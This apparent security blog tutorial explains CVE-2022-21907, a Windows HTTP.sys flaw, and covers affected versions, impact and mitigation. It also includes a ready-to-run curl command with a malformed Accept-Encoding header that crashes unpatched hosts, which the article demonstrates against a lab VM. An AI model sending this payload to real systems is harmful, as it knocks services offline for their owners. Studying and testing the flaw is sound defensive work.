How to exploit the HTTP.sys Remote Code Execution vulnerability (CVE-2022-21907)
- Updated at
- Reading time
Pattern recognition is what hundreds of security specialists in our community voted as the skill to cultivate for a rewarding infosec career. While we have some innate pattern recognition abilities, developing them is essential – and that’s a matter of practice.
Working in offensive security gives you plenty of opportunities to do this, with new vulnerabilities ripe for close examination. So let’s go ahead and do just that while discovering how this CVE carries echoes from another vulnerability from a while back.
What is CVE-2022-21907?
CVE-2022-21907 (CVSSv3 9.8) is a critical vulnerability which affects the HTTP Protocol Stack (HTTP.sys).
Wait, what is HTTP.sys? Well, HTTP.sys is a kernel device driver found in modern Microsoft Windows operating systems which is responsible for handling HTTP traffic in services like Microsoft IIS.
Most of the research done into this vulnerability has revealed that you can trigger the infamous Blue Screen of Death crash in the underlying machine that runs an unpatched HTTP.sys driver.
This sounds a bit familiar, right? Yes, it does! Some of you might have already thought of CVE-2021-31166 which is pretty similar to our current vulnerability.
For those of you who don’t remember this CVE from back on May 21, 2021, it is another vulnerability in the HTTP Protocol Stack caused by a use-after-free type of bug which attackers can also “weaponized” – with the proper exploit – and cause the Blue Screen of Death yet again.
In terms of how widespread the vulnerability is, Microsoft points out this CVE can be found in various versions of Windows 10, Windows 11, Windows Server 2019, and Windows Server 2022.
While Windows 10 1809 and Windows Server 2019 are not vulnerable by default, they can still be compromised if HTTP Trailer Support is enabled via the EnableTrailerSupport registry value which you can find under HKEYLOCALMACHINE\System\CurrentControlSet\Services\HTTP\Parameters.
The disruption this vulnerability can cause is rather severe and, although systems might restart and function properly after one attack, subsequent attacks could lead to complete denial of service.
How does CVE-2022-21907 work?
According to the more in-depth analysis performed by the researchers at Trellix, what makes the CVE-2022-21907 tick is an uninitialized memory vulnerability in the following functions: UlpAlllocateFactTracker & UlAllocateFastTrackerToLookaside.
By not zeroing the memory allocated within UlpAlllocateFactTracker and UlAllocateFastTrackerToLookaside, attackers can inject malicious payloads into the uninitialized areas.
Windows versions with a vulnerable HTTP.sys driver
Vulnerable by default
Windows 10 20H2
Windows 10 21H1
Windows 10 21H2
Windows Server 20H2
Windows Server 2022
Windows 10 1809
Requires enabled HTTP Trailer Support
Windows Server 2019
Requires enabled HTTP Trailer Support
Business impact of CVE-2022-21907
As of right now, no exploits have been released that can be used to gain remote access to a vulnerable target. However, there are some publicly available PoC exploits that can cause denial of service.
Business owners and organizations that don’t want to lose access to any critical systems and sensitive data are required to keep their devices updated in order to eliminate the risk of a DoS caused by a threat actor.
How to manually trigger BSoD with CVE-2022-21907
If you’d like to see this CVE in action and you have a spare Windows Virtual Machine lying around, then you could perform the following request with curl on the VM’s IP address.
curl 192.168.0.164:80 -sH "Accept-encoding: 354429474810858105277502,753225473272192695969091599085146218998458873428858279498120&68&**82302744837636557755**9,2120453047251623940869443373783750655190662992171177571578371548748405709,03504570598828001819032433815484769110241925758402724193417475718971298,895259892660286842061499776,****************************267816, *, ,"
I want to credit nu11secur1ty for releasing first a Python proof of concept of the exploit which helped kick-start our research for this CVE.
Here is the command in action:
To replicate the events in the screenshot, you’ll only need a vulnerable Windows release and a service using HTTP.sys, such as Microsoft IIS.
The table above shall help you determine whether your available machine is vulnerable or not, or guide you in choosing a vulnerable release for your further research.
How to mitigate CVE-2022-21907
With these requirements in check, you are now ready to hack ‘n’ roll. Pun intended 😁.
If you have a machine running either Windows Server 2019 or Windows 10 version 1809, there is a quick mitigation available.
As mentioned above, these two versions are vulnerable if the HTTP Trailer Support is enabled, so to mitigate the attack, one could simply modify the EnableTrailerSupport registry.
To remove the vulnerability, users should install the security updates that Microsoft released which patch the issue.
Have a process for your “madness”
Having a method to your curiosity will always serve you well. That’s why I encourage you to “steal” the approach we provide in the security testing and ethical exploitation guides we publish. There’s no need to start from scratch and you can make progress faster if you iterate and improve on a given framework. Tried and tested by yours truly!
See you soon with more guides like this one!
PS: We also update them from time to time, so bookmark this one or any others you want to return to later.